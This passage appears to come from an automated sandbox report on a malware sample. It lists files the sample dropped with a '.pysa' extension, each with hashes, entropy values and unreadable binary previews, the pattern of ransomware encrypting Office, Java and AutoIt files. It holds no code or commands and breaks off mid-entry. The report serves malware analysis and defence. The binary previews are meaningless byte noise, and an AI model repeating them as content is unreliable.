                  SHA-256:FA27E5642B729E883CD2E4F82F1F0272C0136706DDC8B0BBFFEC75EFC39FC855
                  SHA-512:F1792A5C996B4FF4E455798710C630C877678084515D58390227F74C5D8E7915A318DFBAF5CD657C46D79D11BA275BF480ACFB647BA693FC29D7E309805AD11E
                  Malicious:false
                  Preview: ....M4.Q.,..%.6R.5]nW...39I<.G......`..H:,...g<....../m....._D.`:.'.....k3.|.....bY....@.rz,L.......q.......S...\V....jj..f..<6..A..6....;(.0..a..............k."..Vh.......Z.2......48...3.x.+...Q...,!.....I292\.u.....^....y..>.2....S....%Mw.G..G/2}@.aT.%r.-.*.dNn....K..-sb8......3.N..~(4.3.....+.zW.4t.)h0.2.>..s..F.1.a#..hc.`.aS..&'.j.........s..._B.hn.Cm.KZj..:.9E...;..#.*..>..T..}#L..I....v.W.x6...5....c .,h~..2.."...~FV.e.rEr.BB...t.....~..2..n.}+4.<./R.g.'....5.r._1..>|....I.S.4f,FQ....L.Q..gf&?.;(.P..)..A.Ww,x.W.nl../..6:...V.1............5;2...X..X.E$..r..G.....NKw.3..O.]K.>.2u..w.....G._...R...S.=..i...c.XeEu.t+c..0..S!..e.@.0.0o.<.<.S...;..2.*v..d......._{.$t..5....x.9i...%...,.A....%%.\.-..|...u...M].....t...'...(w.....x....'J......8X.i.ST@..#{..5E...*....?w....lN.C..:.-.G..&..u....=c!.\..%.[.......]...k>03.!.m..K.....N4.S.S.tA.....>=..E....._.V`.....L.....)=v&9;.@..E.z.O./'.....-....VZ.'...:...ZI.....j..&..n.].BO0..F`
                  C:\Program Files (x86)\AutoIt3\Examples\COM\Worksheet.xls.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15360
                  Entropy (8bit):7.855591081585588
                  Encrypted:false
                  SSDEEP:384:rMJztCDqfSXq5nGz+s1Lxcr583pa8CuGtB6ycMcvCuuL:ryzojuGzP8r583pa8UtB3cvCbL
                  MD5:89632BC3E61130CEBABF36BE3E626754
                  SHA1:6942C4CC041AB12F195DAF599D2EAFAE525D8083
                  SHA-256:410EBAAC50F0D8FAAACD5B5AA4D783018F1E0F73DD64DB1D095005812F6506BD
                  SHA-512:B655947729D5CE08BA4B4E951452C19C40308E7571572B34AC017EE0C458F0B8B51C0A2B3F6D8BB37862D107F37A11ADEEC2125011D687EF81ED66C4FA75915D
                  Malicious:false
                  Preview: .hJ.-.d.xA.1vM..z.z...%x..u^C$/}.b.T4...z.9.8S..IL..1C'4E..>z.J|.N..p.2cP.7b....n...^i9c@...6...?n...38..s.F.+...T..|.b)$p;.{a....{....Bf9.......;..:{\.......J.6q.....OE+.....M.....e=.b...F..-...HJ..uV^.0{.o.b...n.sw'..........F*F..SZ.....2U2.n.RQ...,(F....U| (.....i..2w.J..!......X:O.*.C.k..nT...3..r...w.......L....2T(..z.."D...t../p.z...T)Ao....,b..(.!..^wb..;^v...m....]..+..q&Y..'B..;e.C)vC...U.(.Y..C..FN.y.....I-....'f.....R*.>.s>...^*....2ip!.a=-.q.....%.yt..<..........*......x.P....Q.A9......@~...z............o..........8ur.*..".Y8..a.}......jOO.......m5..1e..hC8".....).!(Fc....m...7....v/<h]..-..l.[a.k..T..@0 ...z...YxOi....(..h....!tO$....C...B.$...MHK..n....{..'(R..Z.....g..p..,(..../b.Y.Pj.......3..'...../..="8..M.J{.&.-.H..7W...0....C...r....$w'...Q..J.]S.....MN3......./5...o...V<W.....!...T.~.^ 3c.L.rZ.H.;......Y....,......,S.'..y..5.8....x|.E$q[PF.>.,...0.Z.....H.>.@......m{..yS.M0Y|..|.....{.f..f..yfo.2.. L<..O7...Jx..v../..6a5
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\Test.doc.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):52224
                  Entropy (8bit):7.982144359092321
                  Encrypted:false
                  SSDEEP:768:UiJqBpZDltVG4AEXKstEKjZ5L9GxU3hYgsA5qEawgIcu291s0BA6FHECO7zloa2p:U3BpdVg+3tEuL9gCDqEU/BPk39oH+G
                  MD5:32C42E294F23A7DBA52D211B1D226925
                  SHA1:1B2CC637BDE31A39164A38F129FBB235332AB71F
                  SHA-256:A87F93DD04C63AD3D900D5C80C04477E1347FF9BE597F09C2CAFF52D4F639367
                  SHA-512:9F06D4999DB911C86978C9329480085EF05877EEE2BD4745E73E56F67FE2335A4AEE2042096E038F17440EB666A815CCE6F58A0D24DB1EC91E712B8BC44055A0
                  Malicious:false
                  Preview: .]..l..F.K..}.+6J..C.a......z.u.1u.Al..y6 H.=....".,Wd,h..i....K.r.@..m....LP...Pat.x.C....J!.RPh.;.V......UFNS?.....7!W....E.....R......f.K.....mm...vZ....k....#'..@.y.w...&+.t.....'..z]Q..'.Ovc......j.D...&aP]...RU}/-.P...(7.$......S\;...Tr.<.R.H....0.o...s.._..Qw........./...y...3..A1^(......\.I......#yZ0....a...S ..d .4..Q....G....f.".m(....O.n.H.{..d.2.... ..7h.L/.tR..50.u.k.&E..tW7.$.q.a...Y..N.P.;Rz...+k.oT...|4......]...R{.........S......u.9o..cTt0..S.D.\.0..L.;.....lKUY$?..ry....S..S....jpW=%.......=.....T...uW...%..0...r.DC"<A].J...x.*IY.J..:.r.:a'S.........p.;...<.Z.F...}...>..]oSG{W.-f.@.I...N...n.j..V+YBbg#..!>........d.....v2.....aSj.....X.Z47.H..x......#6.|zO..-.^..|.....`.'E1eO..p.S..!.-.Gh.$l..........op....t..x./).-.b..8P{...).o.+-.j.....@....5t'...X=...._..E..>......i.2lK...+)m<.6.....I..A.E...J~.f......d..7._I....pjE.}.=...._.TVF.s....?cw8-xJw.y0...n&......N.]!]_e@r<4..eG.Ck....%`sfh......[..d.........Y....V....J..I...5{
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\Test2.doc.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):33792
                  Entropy (8bit):7.961745073836898
                  Encrypted:false
                  SSDEEP:768:6BXryh1e/1u24li3OfZGc29KnsxYd7v/IrrJTL0cLkUH:6ZmH01n4lMoGc29KnsmcrJbb
                  MD5:22DD9F0A1B109A5F3F90B199C6DF1F1B
                  SHA1:D927D25C893A177D466DA397A076749B6B9A4C3B
                  SHA-256:B80DE3A3EA6F77D73A66F3F3F87422B4DF44362919200B157942B53FC38F0570
                  SHA-512:18A61F3D82C91F03C61663523785B34959ED31F673F6DBF99297F31A9F852652E02521900A01A7106A5CCAB1EDBDF2A43EDE9C7A466264F27C964F8B7AF34124
                  Malicious:false
                  Preview: ..2.........Yv.)...pX[u(.2*.\.r..Lk(..il ..g.k....g.B].U...A.I......n...........].y.T...0M........Fg%W.+.A......qj.[.Vj.Y...*.O..p...0.s./.:..J...`.{<U.e.5=....P.(..?.A.1t.j.@!.8.y..3"...\.z#.p...4...../..u=..F.)t..^Ls...f......_...E..B.\.j...U..D...>....+/.O... ...u+Mh9....5HE.0.s.....S.\.{.x...1.........A.'.C..R:.._.s.j...e.u%|k...O...#.X$)ox..../C......]R...l..b..5Y2#D..N.....E...........p...J..$...U=..8.G.....-.....&..L .x."b......i...v...h.....+.N8..#.X^_.>..8....p.......Ej..P...).....JL...w.o{,..7%....}.../9o5.;.P......-.O`.,..EZ..vK.#b(A...-.A..o.OTz.....W...~....2H..B>..."mV.a*...}.....Ys.,g.KV=Z).2.,....!.....G.;.....)>.........*..@.R"H..YL.w....V...n.........TOj ...b.v.....E4.......U.1.W.C7..v..L..'.....R.x.n..6.A.+f....0yG..q.x5A.:.l...2&......s.9..*...o....%..g......:..m..i.9.q.....F..G4.S....D............`..a.eLez7.8...+S.`t...!.Tul........D]....6+zXxSm.d..N.......e..~...*.......W..^..;..\......-...`..&...l.0.
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel1.xls.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):309248
                  Entropy (8bit):7.99892925625825
                  Encrypted:true
                  SSDEEP:6144:YbQ2/yurkH6U8O0ZdZcTl1hfkGZ5Bqhv0or1GoHbix/eUlJ66SaWquMtB8/b:eQOyPaDDCTl7DBkv1JSJf/duMtkb
                  MD5:5CBA3DA41F0E461DF0DB05634D693E38
                  SHA1:32C2A22CFECF673376B3292EF85D595EDA1314BA
                  SHA-256:EE31205352442ACD16F8D0711862EC18F5C3F03E80A53A6769AB75D499ACF73E
                  SHA-512:ED0155E866830F10BDC162EC7E2271845A26594215CBC9069A6DA696D4BB2AAA661BFCFADBBDD6723AC8CE8651E34DBAC3765DA7CFB72F199C5F2AC3A23A3D0D
                  Malicious:true
                  Preview: ...w....o..f.m.X.,6}...]..dU.......|......QM.f25.......\.b..k...Y,F....O..".]J.&..-.!.f.!x..2n.=|..D...Zv.o.._4W..J .h..P................j..\.p.....j`.R...._...i...M.....z*/..,..Z......C....6....3..a.u./..kq...}Dy.. ]O.j.}..8.9C6...3...........*.......Z.....l.d.......n..c.M.B..1+...f..I.}...l.h.]A.Ft3..rK[.s.m.~q.@u............r....43....._.vd...yY..!.w..;.rEQL.w.?Y.m..)....7...q....n..Qx.-%.GYT.q.$.....6W.k..=..|..f.0..kMUA...ggu....`.d..2..w. .h..3+.6.X..Hc..@..1.y...}+y...Y.].a+.....iY.m.K2...".ZK..c...KH?$a.M.:......z.(....=U..Q9.i..<....}*...#...fZ8.K......]... tP..V$f...^.....e|......i..)....8HW......v...'7..".c;..w.j,C..1....G..h*o.k4.|...@.>.Q.(..b...e.6..B.`4./L .r....K..F\t...^.]..C..SD.`R).6.w.k.....8.8R...i........o....(R.n.3/...m..>.4.8 ....M..H$.f.1\Tc....c....+.}.Kx..I.t>4..."...>.!..7X...4I......4t3e.{.N.m3...3).......l...oC.~;...|D...K._.xIj..O...m.uR.t.'B+...X.....w..Kd......Q4.S.O.....5.q.0;}.30..Z....W.....1...
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel2.xls.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):411648
                  Entropy (8bit):7.999389779322184
                  Encrypted:true
                  SSDEEP:6144:Y52hLJusyPw65UTAgUbJgZvDx0hCvW80eewjwgtt9LWHhEIao1Qp7zj:YClpiV5sAgW60hCeSwgLYmIO7X
                  MD5:F4CB73309BB755199401A13A72C019EB
                  SHA1:B39762435651B50FF1A498C3C119EBA4A52DCDD7
                  SHA-256:8E74CCD071915C150B0627035818390D078F2B8732D4BF806A3B1157CEF21450
                  SHA-512:1D5DC9A7AC97B45275F5FF49A6E99DA79494015DEDFDA17DA5F416B2F42119CBEF99E7703E97A8D62D508EC3817DE015E0496626FE6F87ABB860F88F707FE3C6
                  Malicious:true
                  Preview: I.....-B..uuM.$.@......4.9+.'......._.R)1.wl.N..|...5......j.^UI.G....F..7.....T@...yB......|...o.....!7Q..z....)....S/...G...y....N.l.u*.|r.....lq`N...H.."...Ppg.d........{8..t....y.d.u[O../6....E ...x...]..........8J=.5.p[..:....n..4..n.d.O84.b.ZD.P0..2..#..Je>Q.h..{....R..p.. ...9.<..TM....N:.A.BfO....p...d/8.i1...{..Mwg..y...h..=.s..5...'.r.*.Gv.4., ...S........].r....{...$.R.P.%....a...L.{.]r..1C..(V.....o...G...h..d..zkdbka...".@06....IA.....j.".j.e-N....[-J.F..B.....n."...U.....+..U.b...7(^.X!.....p.,.....R.7..5O[.1.....O.O..+.r.v.%....m..o....3uz>...............a.{.YP.U...d.`7CE..o..i.......Q=9..X..R.....<....7&...L."........r........S...Yks....V&....p. ya.E.....2y.)p.$jS...^. M.UZ..6.'.'..Jr....v%C....,.......(.c.d{...>. .0t..E..|.t.D...x./..Cp$..uiP.6D.=.xW.4.d.y.._|..dq.F.........DiZ7K.:;..=.....4.BfJS)L.!.U#.#...uaxN.~....%.j{..F*5..r..N.C.x...=.`p.hs~........a9..e.Z.....0.M...e..2....g.?...l:.y@O.A....G1U.(_..e.S
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel3.xls.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):821248
                  Entropy (8bit):7.9996890542661525
                  Encrypted:true
                  SSDEEP:12288:csq5qtTmHDzvSxGPmb3WhCe5jTeS0d9RbRQxULh6WKWplClYttOaxuB8:4OmHPjmydVTehRbWxa/lYY7Vxo8
                  MD5:44BA4CE38C29C2CC974C402349A66139
                  SHA1:B3C1532F4944D0B372D10885F322CD74D7B05B40
                  SHA-256:B2A5C85253F5EB8439BDFC54A5C2B54D41EAD1ACB60B31AD0C4B0F0D8FF84E3F
                  SHA-512:8205E866741679164C69C9460010F2F153EA32A334918E58FDC0E270150493D25511CF930B1D8309BF17A97DEAD6ED889D191D67703CCFDBDB962C90C65DF610
                  Malicious:true
                  Preview: .\.B.Y..A.|..._..m..%....=.'b......}=c.f...."...z.o.q...Q..Y.. C..K!...w^..o........b..01.R......jF;.k'...Jh..w.A\9...L....w{.$?Gq"L..j.....g$Vq}F.[..!.a.;>......Ufr.u...`T;...,.On:.8..xb{b.?./g...;b...2...."..r..&/....w=..VY.2..Q.0......G...I.... b..#....]P:..#...t.G...\..@.u.q...P.-...MB.bk..d Rg.S,;s...$d.N.6..)p.D.a^g......sY...*...^q.B../..b.e...;.....m.n....Z^..m+.s....07....L:$..".<Z.c.C..2...TI...n....2*9.<..C..}[.w0Qv'...\.v..#%..*.t3S.tu+..}..'c.8..Hy+...D.q.G... ...!.NQ.`.c........8..I....jz..(..z.8........Q..,~h.<26qc^.S...fL.}.h..ya.@...F...o=^.V...I.........(,....L=n.......qs.d$...$f...J;2..<...s.3R...pOn.....HG.......K\.mI...>...>.U..uU8.[B...I"..a..(.@d:.;.\W..D=U..L.....G.V..S.i......$f....l.Z ...iK..."....]...M...zyl1...)M.(....rJm.MwM._N{.Y`.../.R42..;M...PM........9....Y._..V..6q.l...a"<$.c...q.....:...q...a.......$1.:L..;.[.,.l...y.q......&..q.........6.b.aU...Q...M3.+.TqV(Gu...l...#6.U..N..v...-..G.&..0 ..*.s.".
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel4.xls.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):25600
                  Entropy (8bit):7.940596673597301
                  Encrypted:false
                  SSDEEP:768:yohfclv/P4d9KLIYlVSq69k9z/OR/6IRi96:yohfclvn2KLIYSq6ozWZzRs6
                  MD5:22AC35BDF5434AFB9D5C845F7F07304D
                  SHA1:70CA56A054ABDF7856A077636A2317B8F2D2ED14
                  SHA-256:3742271BA4C04338772132287B0DD73E73C1BD761DB4F8B7BC660EFE46517F17
                  SHA-512:D966E3B42D1312CA305702AD6BD91A97D512C4339BE26B25DC3CE37E8B42484CC432A9AC835A3A150BB0C629488D6A42893304B3394B7D19D2D04C1D85D31EFD
                  Malicious:false
                  Preview: ..6~.$..=v....4.....o...<..8.U...;.q].....rlW..Up...x8.dVZ$.D.Mb.g...h>.*s...s.~B..r?=8...q...v..{....D&.1.E..."..........L...N..(.0}.zp80f.Pw.......tr4{.|d.yYK.....s....y.r....v.=.....M.......UZ..).....}B..h.v..=.....=...n.|....yeU..Z.H9.Q..".m..H...5.3.*.G.+...@...\.,...m..] ........Q.P5...Y.M*..0.....{...Yn...x.#.Z..mH.O..0...s.#.o....k?....a.0..Ry5...*...P0pe..........p...8.@..>.L*.F?a.h..A...r..m..}....&.b.9.-...a..B8...+.^....r..h...3v5y.H..5...Z...Z...G..o(.B\K......a.T....6\B.b...r..G3J...0...GF.a.o.|..6..~.F..Q......I..x.wB..f.3....(T...Q.....:.gvit.l.y...,.Ez.......{...%..7T....<?.w.|].9....Jp.P.{..z.{(.KO.u...]L!..h.3...Cb..z-.sWZ....$...(....&..Q..L0.."(..w+./.....'...F.......B.7."..4.1..hR...2.A>Yuhe.0naO;=b.&[R).a...u.UpH.zH......w..9FpC@.\.g....... j.K..J..G...z?"H..[..kf1...4nAC[.#.....L..3..v..@P.9.I6.K.R..kk.i/..d..U._n...L..:.w..Q..`..~.?<ODr..........QA/...-......R...Ks.2&w..V.b<....K.......*).yA.+....Z&.k.xS..d...G...aIP...
                  C:\Program Files (x86)\Java\jre1.8.0_211\lib\deploy\ffjcext.zip.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15360
                  Entropy (8bit):7.858624509711282
                  Encrypted:false
                  SSDEEP:384:tZCWYykFDiQuo/iPbYSQfDILLYLA/rzBL+5ll9U:tccfzYSQaomzB+5ll9U
                  MD5:9B88319B5911F1AB5AD660355F847B3B
                  SHA1:C08C52FCE16EC3A7637BF8B6DE576B32D027F472
                  SHA-256:EF483A9AF808BD1188432BF6F27E06EEF53B5B03A793B00D47EB3CEAB3B92AAF
                  SHA-512:B04BF76AB6113AC0EBA4D8655C2C8967E6CF1AE8122C1EB6646CE39AE5290F230748DA135C72C15294CF51B0CBEC5CAF3F5C0FADAE7FEEE4275D821B2CE44003
                  Malicious:false
                  Preview: ..^S....Xt.yx.7.^.]C.N.tt5d...{............&...):..u.j:.f.....{sh..'?...Zbl.=....Mg.}\E...r'..'..j.D..Xr'v..B.?....o...}kF~'....S'...wz"<....k...>.L....t6s..zj.VTE..7...X...Vy...I!....n:z....7mc..l.q......$].w.........a...._...2..5W...bF...p....X.V].\......\v...jd..s.9....H.. &..=.d].i.).....].D54.....{...o...l..*..'.I.1......X...a./..D.!...YA...J.*..?....b+..6gy..0..(V"..=6VU...H'.W..E...sq......Yd+F..A]..k...,.)..Gb.O...B...SQ ...!..8.@.Y...RO...{Q..r.D.Ww,?....~....e&.<..Yuy......%....7.)...d.8.gY..v..3..x.CU'..s.q...U..........O.,p.i$.WX9P.7..t.;LW*.1bqr..}.R%.jP,...$.nX...v.._..Gu........-.8_}loP.-....w......$.#..u..0$,...Xr..@.......l.6..C)D.?*l.%6..e....]..Uw....u.W.oNFF.yp.>u...|..>.>q.?.EcFXH...Qo.y}wg..X>b....]...4Ax.X#t..G./-..;....8.#...$~h..K..bg_......Q7+...f(D.s./...X...".Z.%|..^..6......<...:..8.1L~.%....G........dP/.G.#..J.z[.n...K.y.".Qh......!7o...j...X..........dxX.../.T<..V.].Ye<.....b^0c.....S.....*0...%...d.\..e.S.
                  C:\Program Files (x86)\Microsoft Office\Office16\1033\PROTTPLN.DOC.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.919061329435883
                  Encrypted:false
                  SSDEEP:384:HJGytaw7/a4f46/4W2+xkykJ4Nmpaibqvr9elIKkkgjC2Y/XwzRI1LZ5rNkH:pPtaw7iM46QWBzkJ4EpagoWkkgzGXwz1
                  MD5:EF08203F1DDE547C9037A6E0538DB42E
                  SHA1:A9DAC678F71FFB70C4F268F5621DE3C9D3461E62
                  SHA-256:C601FA0BD7D5FA3458B9F0A15B88A674622C1C77DEFC99E55F475AB371CA7AE5
                  SHA-512:0CD6C24628B8AF517321C33D5F4B9B28F6D4BB52514A675ACAF9E592D62268C1508D0F48CD1DCDB65B2116D57A76E563929D505DF27A021862ECDEDA57A18C74
                  Malicious:false
                  Preview: 8.,. 4^.S...'q..`.O..._2.xK..JVI..@k.7.$...%,t...P.}fR\y.w..#...m...p..dLX...............+H[..bX..P....c9..".iN^.UZ.P......S.kd.Qa!.P..l>....\...A70!.+.0D+./.t........9.1.?..r..o/.2!Y`Q...*.EL....d...'..0t..."..yHJv...q.f.`..-.[2..t.!.d.v:..J.d;e..!....*.an...T.........o.)7........a....O....E...HS......m.r;..t......`.p.s..F.}...c.....`..VS..\d`... n.;.v.~.k#.y..?..k^Y.f.....Ua$......m.'.I.f....zf..@)....#.%4[..URV.....5.....(....l9.z.......~{..S.1m.6.#L..(...).....uM..X..4.R.....Ro.<?.*J.Q...X.i..i;3}........(......j.{..AT...U.):j.O"....`Y...b...rv.X..^D......N.n..a9.v~......".8>3.L.X...#k.&OJ....."y;....9[Dw+....N.\S....|.,.?S..&H../.......X....@`jg..".y)Y.0p.. ...XM...,..c.#...p.|Xm..Zzj...../.......S..jr.o9..[r|..d.5.w..:"..B...B......C....UA|.9.(.~......Um^...M.3...5E"q.g.Wa.a.<,...r.HI..HY/_lW......t.WS..~I.g._.:1 @.nm..a..:.t...}...WX.......M....v.....<.8..1..I....$...Q........g......<[TA.e1|78N.*.v...".5O....q.c.a..........T.g...uE.^..k..|.C
                  C:\Program Files (x86)\Microsoft Office\Office16\1033\PROTTPLN.XLS.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10240
                  Entropy (8bit):7.720612944457185
                  Encrypted:false
                  SSDEEP:192:7V9H1FXvwdzcCBd+jHR/d8kxWXKJeVvWbIlmQoLoH1pQUBIewAzc03F1A5gRSlrH:7V9/XvAX3EtKmCMovmIlFoC1p62rTSlT
                  MD5:E36D96E597FA999E90CB8EC523D63FB3
                  SHA1:5FDBB61D379DED303D7381DD37FF5A3F71DBF57D
                  SHA-256:C5B8B0BC1A27E0068D4D82B1DD120029AFBFEBFD8C70AF86CA5550015FB2A871
                  SHA-512:B8D05119F2BE5ADC8459D4E0BD2416EA37160D2FE31EF242F56F7DD7760E0E34EC89B37D544E127B272D513C4FC356668E24AB74400D4FD46D837C439FDBE252
                  Malicious:false
                  Preview: ......8.}...E. ..NWE1.A.6Y.i..O....e.t3U......7.'|:.L.."...4m..zz..i`~P.8....,ziw.zq'...'X.@.oG+...Km....!..VT.jD7..9&..'r..[.....o3...l..eXd.Ry..?.....K...}.\T=:t>..6+9...............\..E.... .....2t\,.&0....d.z...'....o.t,Q.m;...5EQ....8F...%...n.o..W(2b9....`....Q....q..f.....4.e.dys4..7..@.(.h..{..vB......)....5..pi....).".ZG%..ND"...y...V.2...i..M.h........<....y...;..dr....z3..Y.F..F.j.vHi..[....\gb7AJ....'V.i....D......c#.2....8....+.k~Q.ZU.q.....o".[....*!S......M^[c.|.9..w..b.....u..g.....g.I..}.jRr..i...\....[.T..~....h...0..lx'..I...h....2...T.....k.....a.QZIh!.fdh...?W7..3.2.@M...i..T..7...p21.&.%.....>.#..).[N...].=.S\...]7.+..<.O.g....-0<mP`0.z........yvr..'kcxz;...p/..u.}gT..Ty.&..Ian..V.mM.C9.O.....x..7..g..[3.L.....cmi..H..."...<l*.d.$.@.C.4.2..3.......N...x......._...D...+.....T...`..}...<M......k....Uw.JFz.+...0....8*.A.[.9..~..|k...<...l.2....W.Y)>...5.V..".l.'....Q..k).4...j.ar...@].....(z...-....... .L ..B
                  C:\Program Files (x86)\Microsoft Office\Office16\1033\PROTTPLV.DOC.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.917888116721629
                  Encrypted:false
                  SSDEEP:384:cKUieFRbgTkIDBbE2+kuELZ8tVItX2c3PIbayFwVGnA2pj9aLWjTX8+d:cNVJQbE2TuELZ8EtX2qijFSGnA2pZaLs
                  MD5:852CA8A18E5EF5480380E98223130D70
                  SHA1:BDA09F66BA7892C67BD6588EE2BB51F048F86AC3
                  SHA-256:BC5949F23394B67994377D0BA9377D4A48EAB7D1CE81BF09F6F3C59DAB6150C6
                  SHA-512:C24951A11B5E421378D3D6F9AA68833EF0C112103E65F51D7BA8EA51046020F39DDC47449BECB1AB24F001E5B781B71E8FE23A368A4B5AEAB9016290EFBBF8DC
                  Malicious:false
                  Preview: b+....r.e...u.......S.'........P..\....).y.U..Z.m2.HB.D.`m...~.'T....2.e3.|S.H..`.p.s\lW....H..^`..r3..v..'q.VJa.2.Fk..S.....7J..8.....(.C...2..]Q;.:o.U.../...Y^^...v.%S...f...$......=...GN5.........{....\V.......t........._Ur.9..BeD.*.Jk..."....J.<)..i.......a1..-..I..vTg....i..ty.M..+rFzU&..t...r.i.vlT.8..4.eE...zfl_yG=@..<.....P.DJ..9.~W .=3.......0.......!u...9o@m.......O.qL...N@.x.4.e.....k..E...;.....Qk.y..Q.G..[...o.#...}BC =..Q..O..hP..N..q;..>..w..|....l.q&d.t^.h.3.Z.GGY.mT-A..VF...QA....r..g{$d...k. ..3...p..p.Q....od.."bn.o].FT....N...#......P..w.ig...Y.u...[.e.r.C...<... .F.&.k..".SJ!.b.T.{*.6u....%.... ...^F{.....y..YV.'..;n4.......a....+.:0...F..<.b..<...`E..E.......B{.$S..?,...!E.y.....E.k..F6...s............u.....I..1.}kCS|...0%.....|.$.J5....E.._o.o.G.V,N....;....q|........3.....F.E.S.P#.?Pk~.-.sS.....35..^..j]s.#.........I.P.Y..UUY..&...7...Q...7.t..1bU/.....`d..b..Z.).Dk..7..].FB.|5.U5V........#..I(..
                  C:\Program Files (x86)\Microsoft Office\Office16\1033\PROTTPLV.XLS.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10240
                  Entropy (8bit):7.718405855722776
                  Encrypted:false
                  SSDEEP:192:Zm+32xcOZwFJlJJsoaxOk21shNVbf1dGyENTO1iVcOhV:ZmO2eRQotk2qhNBN12TO1iVl
                  MD5:76B7A562A391CCB97C7B2CB8F5F2FCC6
                  SHA1:8167416CFACF0B3EC085D9B0C7F255169722D12E
                  SHA-256:8B3259E332EC2A4703F04A927C71114EEC1B1630337629D89699A561E3003DF8
                  SHA-512:E3AB39648D700824AF4BB4255E3D837AB856CA6EC44E133413F45282C56EED63AC6377EFF86869D72AD480F9B366BDD503C9B72B3ECA49575630BC980013E857
                  Malicious:false
                  Preview: W....-. ....{|"~..v....;Z}AH.A..@..=.qq....&..Hw...k+.NY.......p..I`a.....m...PG.b....I+9....J.#L.o=8.^..A.TX..X.v^........M..<....`O..,..'..p..h.g.....!:...?.,...b.r.....(t..y.D.Y....8|E..gF..J.U..;..aF]W6J..a.......C7.."a8z;..N..s..."].E..|....?m.f9N..]..:Et...UF.g.2.......6......e.*...xi.d...$ .I.B.9.J.."EG..8....4)C..N..vb......0B...u.$..T...D......#.P.=E..<.Z...Epvm..gZ...3>b..@ua.L7......@.....B8.....E..^..7..._v....b?..R..Yz.....A..........+.y..g...L.Ur.>B.f..F...c......&4x`.3.n..P,*.Q..{6.]..W&......../G"....p(..........n)n..R....ja.@..3...]..&#Ot+.......&..y........ye.:..Q.M^;.2B...p)..e.A../...,.G.T.I...V.-.ER.r...CaD.`f..b._z.I=K..`C.*.~...t....G.E-....oA..i,......@...^X...[hI...IBRskSQ$..3.1...5.F..7...m~[%....7I........mD.q|w..X8@SZQ.o..-..5.Us(-m.F.`..S..f?..5..hj...MdK.vi..(F#c....'..o..J.50vo.oA.j.di=...}......1..p..[s...>...Rf....~.>sh..).$...<.~K).X...1!..VI.......J.. ..k+.&.q.ZQj7p...%..f.J...v...__.,.......O......
                  C:\Program Files (x86)\Microsoft Office\Office16\Ocomprivate.zip.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):90112
                  Entropy (8bit):7.9937492606316995
                  Encrypted:true
                  SSDEEP:1536:MYhUHgBUFctf3iHu+M2fCXh1VzLgK3vOuJD2JL5W15CLP:LuxS13iOX2ShvgK2M2JK5M
                  MD5:6B3FFFC96E79572E1136E12B76D5D622
                  SHA1:8167EBAA88B61BF2DF7A5480269BB93BD5F68CF4
                  SHA-256:3B8B9D206E30658859E964125C11257B682AA84BD31AD5ABC6DA86C9B9EB5098
                  SHA-512:1B87D935867AAF504EB46BC2B9C999E5FD2F45AF91ABE495EF40AE7CC95AE90A4032FD99524EB7666054DE8EBAD3DD083134C0AEDD62CF25FF8706F78034A7B1
                  Malicious:true
                  Preview: ..t....r...J.V..r........)z.MA.w.^.j...]..i..^........Y.....V. .q..<h_p..p..Z..[U...#..'...n_.+.........}.....>e..;9M.+.?.f..p....?a&..`L.u...Ei.7./X....z.f.=..SA.F`:...djB.a/....Y.{....Q..@....)..,.T...?..`x..?...R.m.'.6~)..N.VL..T.1.....N.."P..{.O...C7..!....!..3TO...U..Ks:QO.9..z.I.;+S...//.Z!...{..|....8.y...z.....,Q.}M`..6(.F-F....*.`LWaX<+.w...[....an.+..#s..:.H....K.....C..9[.p..~...u....~.s]..O_."9..mC....R~.?...L.../; ...'.Y.v.|..`.i..Oax......D.3.gk......Z.0.3...V.1..G...~.oF$l.....7.c.F...Cc.}<.>.!E..ZJ...$C...P!...c`.$.&.7..^....~...4...............V.....w..........KR)...h...r.q.7.o.K.g..FQ...1.u ....^~.ksb7..1..N.I....4.(J..y.@.j.e............1..R...A]G...".G.R~o.<.-5d4.9..W......`&JT.;.h.h.G....}."p;4...........~....Q.d.9...N....,.wq....q03.`.........H....#.{v.n...X.D..^.....f.L..K9..3.~..37..]..n..5.V...$%.XC..w...L^...........bG;%.... .k.&.......8.!.#...P....Lfkn.pd..J........3...!..c....v...#...N.bH.3.zh:./...d<.......
                  C:\Program Files (x86)\Microsoft Office\Office16\SAMPLES\SOLVSAMP.XLS.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994052733481324
                  Encrypted:true
